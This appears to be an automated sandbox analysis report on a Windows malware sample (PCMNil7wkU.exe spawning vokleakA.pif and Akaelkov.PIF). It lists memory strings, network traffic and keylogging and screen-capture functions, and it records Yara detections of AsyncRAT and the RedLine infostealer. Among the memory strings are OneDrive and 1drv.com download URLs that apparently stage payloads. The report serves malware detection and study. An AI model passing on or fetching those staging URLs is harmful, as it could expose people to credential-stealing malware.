Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enUn~~1
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.sectigo.com0C
Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.dr	String found in binary or memory: http://www.pmail.com0
Source: vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/#
Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/&
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/c#
Source: Akaelkov.PIF, 00000008.00000002.2247159296.0000000017CB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWB
Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4m_0zffjQKuzcWV-4RzvUr745PZwF21rnv86bmrYUTERnhgMrc3IjhKSzlEeoFvlew
Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0d(
Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8
Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000942000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQA
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVf
Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI
Source: Akaelkov.PIF, 00000008.00000002.2236274248.000000000093E000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWD

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, umlRMRbjNqD.cs

.Net Code: lMoL

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04124F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

0_2_04124F7C

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0413F140 GetMessagePos,GetKeyboardState,

0_2_0413F140

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
